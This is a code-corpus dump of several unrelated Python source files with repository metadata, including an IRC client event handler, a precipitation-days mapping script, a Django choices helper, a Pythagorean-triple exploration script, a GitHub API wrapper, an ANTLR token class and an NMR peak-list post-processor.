# TODO: UPDATE EVERYTHING HERE.
def _reply_to_ctcp_version(client, event):
version_info = "IRCUtils:%s:Python" % ".".join(map(str, client.version))
client.send_ctcp_reply(event.source, "VERSION", [version_info])
def _update_client_info(client, event):
command = event.command
params = event.params
if command == "RPL_WELCOME":
if client.nickname != event.target:
client.nickname = event.target
if command == "ERR_ERRONEUSNICKNAME":
client.set_nickname(protocol.filter_nick(client.nickname))
elif command == "ERR_NICKNAMEINUSE":
client.set_nickname(client.nickname + "_")
elif command == "ERR_UNAVAILRESOURCE":
if not protocol.is_channel(event.params[0]):
client.nickname = client._prev_nickname
elif command == "NICK" and event.source == client.nickname:
client.nickname = event.target
if command in ["ERR_INVITEONLYCHAN", "ERR_CHANNELISFULL", "ERR_BANNEDFROMCHAN",
"ERR_BADCHANNELKEY", "ERR_TOOMANYCHANNELS", "ERR_NOSUCHCHANNEL"
"ERR_BADCHANMASK"]:
channel_name = params[0].lower()
if channel_name in client.channels:
del client.channels[channel_name]
elif command == "ERR_UNAVAILRESOURCE":
channel_name = params[0].lower()
if protocol.is_channel(channel_name) and channel_name in client.channels:
del client.channels[channel_name]
def _set_channel_names(client, name_event):
channel_name = name_event.channel.lower()
client.channels[channel_name].name = channel_name
client.channels[channel_name].user_list = name_event.name_list
def _remove_channel_user_on_part(client, event):
channel = event.target.lower()
if event.source == client.nickname:
del client.channels[channel]
elif event.source in client.channels[channel].user_list:
client.channels[channel].user_list.remove(event.source)
def _remove_channel_user_on_quit(client, event):
# TODO: This solution is slow. There might be a better one.
for channel in client.channels:
if event.source in client.channels[channel].user_list:
client.channels[channel].user_list.remove(event.source)
def _add_channel_user(client, event):
channel = event.target.lower()
client.channels[channel].user_list.append(event.source)
|
bsd-2-clause
| 5,246,288,881,876,310,000
| 34.401055
| 96
| 0.599583
| false
| 4.204325
| false
| false
| false
|
akrherz/iem
|
scripts/climodat/precip_days.py
|
1
|
1747
|
"""
Generate a map of Number of days with precip
"""
import sys
import datetime
from pyiem.plot import MapPlot
from pyiem.network import Table as NetworkTable
from pyiem.util import get_dbconn
import psycopg2.extras
def runYear(year):
"""Do as I say"""
# Grab the data
now = datetime.datetime.now()
nt = NetworkTable("IACLIMATE")
nt.sts["IA0200"]["lon"] = -93.4
nt.sts["IA5992"]["lat"] = 41.65
pgconn = get_dbconn("coop", user="nobody")
ccursor = pgconn.cursor(cursor_factory=psycopg2.extras.DictCursor)
lats = []
lons = []
vals = []
labels = []
ccursor.execute(
"""
SELECT station,
sum(case when precip > 0.009 then 1 else 0 end) as days, max(day)
from alldata_ia WHERE year = %s and substr(station,3,1) != 'C'
and station != 'IA0000' GROUP by station
""",
(year,),
)
for row in ccursor:
sid = row["station"].upper()
if sid not in nt.sts:
continue
labels.append(sid[2:])
lats.append(nt.sts[sid]["lat"])
lons.append(nt.sts[sid]["lon"])
vals.append(row["days"])
maxday = row["max"]
mp = MapPlot(
title="Days with Measurable Precipitation (%s)" % (year,),
subtitle="Map valid January 1 - %s" % (maxday.strftime("%b %d")),
axisbg="white",
)
mp.plot_values(
lons,
lats,
vals,
fmt="%.0f",
labels=labels,
labeltextsize=8,
labelcolor="tan",
)
mp.drawcounties()
pqstr = "plot m %s bogus %s/summary/precip_days.png png" % (
now.strftime("%Y%m%d%H%M"),
year,
)
mp.postprocess(pqstr=pqstr)
if __name__ == "__main__":
runYear(sys.argv[1])
|
mit
| 4,895,807,264,595,162,000
| 24.318841
| 73
| 0.557527
| false
| 3.283835
| false
| false
| false
|
SurfasJones/icecream-info
|
icecream/lib/python2.7/site-packages/model_utils/choices.py
|
1
|
4990
|
from __future__ import unicode_literals
class Choices(object):
"""
A class to encapsulate handy functionality for lists of choices
for a Django model field.
Each argument to ``Choices`` is a choice, represented as either a
string, a two-tuple, or a three-tuple.
If a single string is provided, that string is used as the
database representation of the choice as well as the
human-readable presentation.
If a two-tuple is provided, the first item is used as the database
representation and the second the human-readable presentation.
If a triple is provided, the first item is the database
representation, the second a valid Python identifier that can be
used as a readable label in code, and the third the human-readable
presentation. This is most useful when the database representation
must sacrifice readability for some reason: to achieve a specific
ordering, to use an integer rather than a character field, etc.
Regardless of what representation of each choice is originally
given, when iterated over or indexed into, a ``Choices`` object
behaves as the standard Django choices list of two-tuples.
If the triple form is used, the Python identifier names can be
accessed as attributes on the ``Choices`` object, returning the
database representation. (If the single or two-tuple forms are
used and the database representation happens to be a valid Python
identifier, the database representation itself is available as an
attribute on the ``Choices`` object, returning itself.)
Option groups can also be used with ``Choices``; in that case each
argument is a tuple consisting of the option group name and a list
of options, where each option in the list is either a string, a
two-tuple, or a triple as outlined above.
"""
def __init__(self, *choices):
# list of choices expanded to triples - can include optgroups
self._triples = []
# list of choices as (db, human-readable) - can include optgroups
self._doubles = []
# dictionary mapping Python identifier to db representation
self._mapping = {}
# set of db representations
self._db_values = set()
self._process(choices)
def _store(self, triple, triple_collector, double_collector):
self._mapping[triple[1]] = triple[0]
self._db_values.add(triple[0])
triple_collector.append(triple)
double_collector.append((triple[0], triple[2]))
def _process(self, choices, triple_collector=None, double_collector=None):
if triple_collector is None:
triple_collector = self._triples
if double_collector is None:
double_collector = self._doubles
store = lambda c: self._store(c, triple_collector, double_collector)
for choice in choices:
if isinstance(choice, (list, tuple)):
if len(choice) == 3:
store(choice)
elif len(choice) == 2:
if isinstance(choice[1], (list, tuple)):
# option group
group_name = choice[0]
subchoices = choice[1]
tc = []
triple_collector.append((group_name, tc))
dc = []
double_collector.append((group_name, dc))
self._process(subchoices, tc, dc)
else:
store((choice[0], choice[0], choice[1]))
else:
raise ValueError(
"Choices can't take a list of length %s, only 2 or 3"
% len(choice)
)
else:
store((choice, choice, choice))
def __len__(self):
return len(self._doubles)
def __iter__(self):
return iter(self._doubles)
def __getattr__(self, attname):
try:
return self._mapping[attname]
except KeyError:
raise AttributeError(attname)
def __getitem__(self, index):
return self._doubles[index]
def __add__(self, other):
if isinstance(other, self.__class__):
other = other._triples
else:
other = list(other)
return Choices(*(self._triples + other))
def __radd__(self, other):
# radd is never called for matching types, so we don't check here
other = list(other)
return Choices(*(other + self._triples))
def __eq__(self, other):
if isinstance(other, self.__class__):
return self._triples == other._triples
return False
def __repr__(self):
return '%s(%s)' % (
self.__class__.__name__,
', '.join(("%s" % repr(i) for i in self._triples))
)
def __contains__(self, item):
return item in self._db_values
|
mit
| -3,453,485,655,542,937,000
| 33.652778
| 78
| 0.591383
| false
| 4.628942
| false
| false
| false
|
donbright/piliko
|
experiment/experiment2.py
|
1
|
3122
|
from fractions import Fraction
import sys
# this program explores patterns of pythagorean triples
# in the stern brocot tree... or more specifically,
# the stern diamotic sequence, aka the 'denominators' of the
# stern brocot sequence aka, the farey sequence denominators
# aka 2*sqrt(radius) of the ford circles
# it looks for 'adjacent' triple numbers, such as 3,4,5 which all 'touch'
# if you draw the stern diamotic sequence as a tree.
#
# 5,12,13 touch, so do others.
#
def pyth():
for i in range(1,100):
for j in range(1,100):
for k in range(1,100):
if i*i+j*j==k*k: print i,j,k
print
def checkp(x,y,z):
if x*x+y*y==z*z: return True
if z*z+y*y==x*x: return True
if x*x+z*z==y*y: return True
def newlayer(l1):
l2=[]
for i in range(len(l1)-1):
#newnumerator = l1[i].numerator + l1[i+1].numerator
#newdenominator = l1[i].denominator + l1[i+1].denominator
#l2+=[Fraction(newnumerator,newdenominator)]
l2 += [l1[i]+l1[i+1]]
return l2
def mixlayer(l1,l2):
l3=[]
for i in range(0,len(l1)-1):
l3+=[l1[i],l2[i]]
l3 += [l1[len(l1)-1]]
return l3
def checkpl(ml):
r=[]
for i in range(0,len(ml)-2):
x=ml[i]
y=ml[i+1]
z=ml[i+2]
if checkp(x,y,z): r+=[[x,y,z]]
return r
def checkpr(nlist):
primes=[]
for n in nlist:
prime=True
for i in range(2,n):
if n % i == 0: prime=False
if prime: primes += [n]
return primes
def dopyth1():
for m in range(0,20):
for n in range(0,20):
a=m*m-n*n # note - this is red quadrance
b=2*m*n # note - this is green quadrance
c=m*m+n*n # note - this is blue quadrance
print a,b,c,checkpl([a,b,c])
def dopyth2():
for m in range(1,110):
for n in range(1,110):
for k in range(1,110):
print m,n,k,checkpl([m,n,k]),checkpr([m,n,k])
import math
def dopyth3():
for m in range(1,110000):
msq = m*m+(m-2)*(m-2)
if checkp(m,m-2,math.trunc(math.sqrt(msq))): print m,m-2,math.sqrt(msq)
dopyth3()
sys.exit()
# pattern 1.. legs 1 apart?
# adjacent in stern diatomic network
# one per odd row
# in stern numerator, accumulate in every row!
# 3 4 5
# 5 12 13
# 7 24 25
# 9 40 41
# 11 60 61
# 13 , ,
# depth in tree = directly related to first #, formula for 2nd two order(n^2)
# pattern 2..??? legs 2 apart
#-1,0,1
#4,3,5
#8,15,17
#12,35,37
#16,63,65
#20,99,101
#24,143,145
#28,195,197
# again, order n^2 (2n,n^2+/-1, n=0,2,4,8,10,12,..). row = ?
# pattern 3
# legs will be 3 apart? (sqrt blue quadrance - sqrt green q = 3 )????
# or... pattern 3, legs will be 9 apart?
# 5, -4, 3
# 9, 0, 9
# 17 8 15 (also 2 apart)
# 29 20 21
# 45 36 27 (also 3,4,5)
# or..... 7 apart?
# 12 5 13
# 15 8 17
# 28 21 35 (aleo 4 , 3, 5 )
# . . .
# note that pyth trigs with a prime leg do smth weird.
#dopyth2()
#sys.exit()
#l1=[0,0] # zero
#l1=[0,1] # numerator
l1=[1,1] # denominator (stern diamotic)
prlen=1000
for j in range(0,21):
print l1[0:prlen],'...',len(l1)
nl = newlayer(l1)
ml = mixlayer(l1, nl)
l1 = ml
print nl[0:prlen], '...',len(nl)
print ml[0:prlen], '...',len(ml)
ptl = checkpl(ml)
print "pth:", ptl
#for sublist in ptl:
# print "prm:", checkpr(sublist)
print
|
bsd-3-clause
| 7,146,669,838,024,524,000
| 20.531034
| 77
| 0.614029
| false
| 2.226819
| false
| false
| false
|
Jucyio/Jucy
|
web/github_mixins.py
|
1
|
13786
|
import json
import urlparse
kwargs_issues_filters = {
'duplicates': { 'state': 'closed', 'label': 'duplicate' },
'rejected': { 'state': 'closed', 'label': 'rejected' },
'done': { 'state': 'closed', 'label': '-rejected,duplicate' },
'ready': { 'state': 'open', 'label': 'ready' },
'new': { 'state': 'open', 'label': '-ready' },
}
class GithubException(Exception):
def __init__(self, status_code, data):
self.data = data
self.status = status_code
def __str__(self):
return json.dumps(self.data)
class GithubMixin(object):
def _wrap_error(self, expected_status, status_code, data):
""" Wraps Github API errors
Args:
expected_status (int): HTTP status code expected for the reply
data (dict): The data returned by the request
Function will raise a GithubException if the status_code isn't the same as expected
"""
if status_code != expected_status:
raise GithubException(status_code, data)
return data
def get_repos(self, *args, **kwargs):
""" Return all repositories available to the user
Github Reference:
path: /user/repos/
method: GET
reference: https://developer.github.com/v3/repos/#list-your-repositories
Args:
*args and **kwargs are passed as GET parameter to the request constructor
see available parameters in the Github API reference
"""
status_code, data = self.gh.user.repos.get(*args, **kwargs)
return self._wrap_error(200, status_code, data)
def get_paginated_repos(self, pagesize=200):
data = self.get_repos(per_page=pagesize)
headers = dict(self.gh.getheaders())
last_page = None
if 'link' in headers:
links = headers['link'].split(',')
for link in links:
content = link.strip().split('; ')
if content[1].strip() == 'rel="last"':
addr = content[0][1:-1]
query = urlparse.parse_qs(urlparse.urlparse(addr).query)
last_page = query['page'][0]
if last_page is not None:
for page in range(2, int(last_page) + 1):
print page
data = data + self.get_repos(per_page=pagesize, page=page)
return data
def get_user_repos(self, username):
""" Return all repositories available to the specified user
Github Reference:
path: /users/:username/repos
method: GET
reference: https://developer.github.com/v3/repos/#list-user-repositories
Args:
username (str) : Github username
"""
status_code, data = self.gh.users[username].repos.get()
return self._wrap_error(200, status_code, data)
def repo(self, username, repo):
""" Return a repository
Github Reference:
path: /repos/:owner/:repo
method: GET
reference: https://developer.github.com/v3/repos/#get
Args:
username (str) : Github username
repo (str) : Github repository name
"""
status_code, data = self.gh.repos[username][repo].get()
return self._wrap_error(200, status_code, data)
def is_collaborator_on_repo(self, owner, repo, username):
""" Return True is the user is collaborator for the specified repository, else False.
Github Reference:
path: /repos/:owner/:repo/collaborators/:username
method: GET
reference: https://developer.github.com/v3/repos/collaborators/#check-if-a-user-is-a-collaborator
Args:
owner (str) : Github username
repo (str) : Github repository name
"""
status_code, data = self.gh.repos[owner][repo].collaborators[username].get()
if status_code == 404:
return False
elif status_code == 204:
return True
else:
raise GithubException(status_code, data)
def search_issues(self, *args, **kwargs):
""" Do an issue search
Github Reference:
path: /search/issues
method: GET
reference: https://developer.github.com/v3/search/#search-issues
Args:
**kwargs are passed as search pattern according to the q syntax specified in the API reference.
For example, search_issues(state='open', label='bug') will search with q=state:open label:bug.
Negation for a pattern can be obtained by prefixing a value with '-':
Example: search_issues(label='-bug') will search with q=-label:bug
"""
q = ''
for key, value in kwargs.iteritems():
remove = value.startswith('-')
if remove:
value = value[1:]
if ',' in value:
values = value.split(',')
else:
values = [value]
for value in values:
q += ' ' + ('-' if remove else '') + '{}:{}'.format(key, value)
print q
status_code, data = self.gh.search.issues.get(q=q)
return self._wrap_error(200, status_code, data)
def get_issues(self, full_repository_name, issues_to_get=['ready'], context=None):
""" Return issues for the given repository.
Args:
full_repository_name (str) : Github repository full name
issues_to_get (array of str) : Type of issues to get (see list below)
context (dict) : A dictionnary that will be updated with the issues retrieved
It will split the result in a dictionnary, according to the following principles:
- If an issue is closed, and the duplicate label is set: 'duplicate'
- If an issue is closed, and the rejected label is set: 'rejected'
- If an issue is closed without the aforementioned labels: 'done'
- If an issue is open, with a ready label set: 'ready'
- If an issue is open without the ready label: 'new'
If a context object is given, it will populate it, else it will return a dictionary
"""
if not context:
context = {}
context['issues'] = []
for issue_type in issues_to_get:
try:
issues = self.search_issues(repo=full_repository_name, **kwargs_issues_filters[issue_type])
except KeyError:
continue
for issue in issues['items']:
issue['type'] = issue_type
context[issue_type] = issues
context['issues'] += issues['items']
return context
def get_comments(self, owner, repository, issue):
""" Return comments for a given issue
Github Reference:
path: /repos/:owner/:repo/issues/:number/comments
method: GET
reference: https://developer.github.com/v3/repos/comments/#list-commit-comments-for-a-repository
Args:
owner (str) : Github username
repository (str) : Github repository
issue (int) : Issue id
"""
status_code, data = self.gh.repos[owner][repository].issues[str(issue)].comments.get()
return self._wrap_error(200, status_code, data)
def add_comment(self, owner, repository, issue, body):
""" Create a comment in the given issue
Github Reference:
path: /repos/:owner/:repo/issues/:number/comments
method: POST
reference: https://developer.github.com/v3/issues/comments/#create-a-comment
Args:
owner (str) : Github username
repository (str) : Github repository
issue (int) : Issue id
body (str) : Comment content
"""
payload = {'body': body}
status_code, data = self.gh.repos[owner][repository].issues[str(issue)].comments.post(body=payload)
return self._wrap_error(201, status_code, data)
def create_hook(self, owner, repository, name, config, events):
""" Create a hook for the given repository
Github Reference:
path: /repos/:owner/:repo/hooks
method: POST
reference: https://developer.github.com/v3/repos/hooks/#create-a-hook
Args:
owner (str) : Github username
repository (str) : Github repository
name (str) : Webhook name
config (dict) : config object as specified in the Github API reference
events (list) : events to register to as specified in the Github API reference
"""
payload = {'config': config, 'events': events, 'name': name}
status_code, data = self.gh.repos[owner][repository].hooks.post(body=payload)
return self._wrap_error(201, status_code, data)
def create_label(self, owner, repository, name, color):
""" Create a new label
Github Reference:
path: /repos/:owner/:repo/labels
method: POST
reference: https://developer.github.com/v3/issues/labels/#create-a-label
Args:
owner (str) : Github username
repository (str) : Github repository
name (str) : Label name
color (str) : Label color
"""
payload = {'name': name, 'color': color}
status_code, data = self.gh.repos[owner][repository].labels.post(body=payload)
return self._wrap_error(201, status_code, data)
def create_issue(self, owner, repository, title, content, labels):
""" Create an issue
Github Reference:
path: /repos/:owner/:repo/issues
method: POST
reference: https://developer.github.com/v3/issues/#create-an-issue
Args:
owner (str) : Github username
repository (str) : Github repository
title (str) : Issue title
content (str) : Issue body
label : Issue label
"""
payload = {'title': title, 'body': content, 'labels': labels}
status_code, data = self.gh.repos[owner][repository].issues.post(body=payload)
return self._wrap_error(201, status_code, data)
def remove_label(self, owner, repository, issue, label):
""" Remove a label from an issue
Github Reference:
path: /repos/:owner/:repo/issues/:number/labels/:name
method: DELETE
reference: https://developer.github.com/v3/issues/labels/#remove-a-label-from-an-issue
Args:
owner (str) : Github username
repository (str) : Github repository
issue (int) : Issue id
label (str) : Label
"""
status_code, data = self.gh.repos[owner][repository].issues[str(issue)].labels[label].delete()
return self._wrap_error(200, status_code, data)
def replace_labels(self, owner, repository, issue, labels):
""" Replace labels from an issue
Github Reference:
path: /repos/:owner/:repo/issues/:number/labels
method: PUT
reference: https://developer.github.com/v3/issues/labels/#replace-all-labels-for-an-issue
Args:
owner (str) : Github username
repository (str) : Github repository
issue (int) : Issue id
labels (str list) : Labels
"""
status_code, data = self.gh.repos[owner][repository].issues[str(issue)].labels.put(body=labels)
return self._wrap_error(200, status_code, data)
def get_issue(self, owner, repository, issue):
""" get a single issue
github reference:
path: /repos/:owner/:repo/issues/:number
method: GET
reference: https://developer.github.com/v3/issues/#get-a-single-issue
args:
owner (str) : github username
repository (str) : github repository
issue (int) : issue number
"""
status_code, data = self.gh.repos[owner][repository].issues[str(issue)].get()
return self._wrap_error(200, status_code, data)
def add_labels(self, owner, repository, issue, labels):
""" Add labels to an issue
Github Reference:
path: /repos/:owner/:repo/issues/:number/labels
method: POST
reference: https://developer.github.com/v3/issues/labels/#replace-all-labels-for-an-issue
Args:
owner (str) : Github username
repository (str) : Github repository
issue (int) : Issue id
labels (str list) : Labels
"""
status_code, data = self.gh.repos[owner][repository].issues[str(issue)].labels.post(body=labels)
return self._wrap_error(200, status_code, data)
def add_as_collaborator_on_repo(self, owner, repository, username):
status_code, data = self.gh.repos[owner][repository].collaborators[username].put()
try:
return self._wrap_error(204, status_code, data)
except GithubException, exn:
pass
def edit_issue(self, owner, repository, issue, payload):
""" Edit an issue
Github Reference:
path: /repos/:owner/:repo/issues/:number
method: PATCH
reference: https://developer.github.com/v3/issues/#edit-an-issue
Args:
owner (str) : Github username
repository (str) : Github repository
issue (int) : Issue id
payload (dict) : A dict containing the payload according to the API documentation
"""
status_code, data = self.gh.repos[owner][repository].issues[str(issue)].patch(body=payload)
return self._wrap_error(200, status_code, data)
|
apache-2.0
| -6,902,052,481,229,804,000
| 35.762667
| 109
| 0.58204
| false
| 4.203049
| false
| false
| false
|
cikelengfeng/HTTPIDL
|
Sources/Compiler/antlr4/tree/RuleTagToken.py
|
2
|
1972
|
#
# Copyright (c) 2012-2017 The ANTLR Project. All rights reserved.
# Use of this file is governed by the BSD 3-clause license that
# can be found in the LICENSE.txt file in the project root.
#
#
# A {@link Token} object representing an entire subtree matched by a parser
# rule; e.g., {@code <expr>}. These tokens are created for {@link TagChunk}
# chunks where the tag corresponds to a parser rule.
#
from antlr4.Token import Token
class RuleTagToken(Token):
#
# Constructs a new instance of {@link RuleTagToken} with the specified rule
# name, bypass token type, and label.
#
# @param ruleName The name of the parser rule this rule tag matches.
# @param bypassTokenType The bypass token type assigned to the parser rule.
# @param label The label associated with the rule tag, or {@code null} if
# the rule tag is unlabeled.
#
# @exception IllegalArgumentException if {@code ruleName} is {@code null}
# or empty.
def __init__(self, ruleName, bypassTokenType, label=None):
if ruleName is None or len(ruleName)==0:
raise Exception("ruleName cannot be null or empty.")
self.source = None
self.type = bypassTokenType # token type of the token
self.channel = Token.DEFAULT_CHANNEL # The parser ignores everything not on DEFAULT_CHANNEL
self.start = -1 # optional; return -1 if not implemented.
self.stop = -1 # optional; return -1 if not implemented.
self.tokenIndex = -1 # from 0..n-1 of the token object in the input stream
self.line = 0 # line=1..n of the 1st character
self.column = -1 # beginning of the line at which it occurs, 0..n-1
self.label = label
self._text = self.getText() # text of the token.
self.ruleName = ruleName
def getText(self):
if self.label is None:
return "<" + self.ruleName + ">"
else:
return "<" + self.label + ":" + self.ruleName + ">"
|
mit
| 460,632,960,464,036,600
| 39.244898
| 99
| 0.653144
| false
| 3.90495
| false
| false
| false
|
kieranrimmer/vec_hsqc
|
vec_hsqc/post_proc.py
|
1
|
2620
|
from __future__ import division
import numpy as np
import os
import vec_hsqc
import nmrglue as ng
class DataOut( object ):
def __init__(self):
self.master_array = None
def generate_master_peak_list( self, y, legend_array, cs_array, legend_columns = [0,5], cs_columns = [0,1] ):
predind = np.nonzero( y == 1 )[0]
self.master_array = np.hstack( ( legend_array[ np.ix_( predind, legend_columns )], cs_array[ np.ix_( predind, cs_columns )] ) )
def writeall_peak_lists( self, master_array, savedir, filestump ):
for sp in np.unique( master_array[:,0] ):
specind = np.nonzero( master_array[:,0] == sp )[0]
sp_peaks = np.array( master_array[ np.ix_( specind ) ][:, 1:], dtype = float )
sp_peaks = sp_peaks[ sp_peaks[:,0].argsort() ] #sorts by first col ie residue number
self.peak_list_out( savedir, filestump, sp, sp_peaks )
def peak_list_out( self, savedir, filestump, sp_name, sp_peaks ):
basic_list = [ [ str(int(c[0])), round(c[1], 3), round(c[2], 4)] for c in [list(b) for b in sp_peaks ]]
plist_as_string = ''
for entry in basic_list:
plist_as_string += entry[0].rjust(4) + 'N-H\t' + str(entry[1]) + '\t' + str(entry[2]) + '\n'
with open( os.path.join( savedir, '%s_predicted_%s.list' %( filestump, sp_name ) ), 'wb' ) as f:
f.write( plist_as_string )
class SimpleViewAssigned( object ):
def readin_spectrum_sparky( self, spectrumpath ):
"""Reads and processes Sparky 2D spectrum using nmrglue
"""
self.dic, self.data = ng.sparky.read( spectrumpath )
self.avgheight = np.mean(self.data)
self.thresh_height = np.mean(np.abs(self.data))
udic = ng.sparky.guess_udic( self.dic, self.data )
x, y = np.shape( self.data )
self.uc0 = ng.sparky.make_uc( self.dic, self.data, dim=0)
self.uc1 = ng.sparky.make_uc( self.dic, self.data, dim=1)
self.w0limits = [ self.uc0.ppm(0), self.uc0.ppm( self.data.shape[0] ) ]
self.w1limits = [ self.uc1.ppm(0), self.uc1.ppm( self.data.shape[1] ) ]
# the below enables conversion of peak linewidths from datapoint units into Hz
self.pt_2_Hz0 = self.dic['w1']['spectral_width'] / (self.dic['w1']['npoints'] - 1 )
self.pt_2_Hz1 = self.dic['w2']['spectral_width'] / (self.dic['w2']['npoints'] - 1 )
self.w0size = self.dic['w1']['size']
self.w1size = self.dic['w2']['size']
def quick_view( self, peaklistpath, savedir, title ):
with open( peaklistpath, 'rb') as f:
peaklist = [b.strip().split() for b in f]
vec_hsqc.view_data.plot_2D_predictions_assigned( self.data, peaklist, self.thresh_height * 3.0, self, title, savedir )
|
bsd-3-clause
| -1,594,254,006,062,670,600
| 33.025974
| 129
| 0.630534
| false
| 2.698249
| false
| false
| false
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.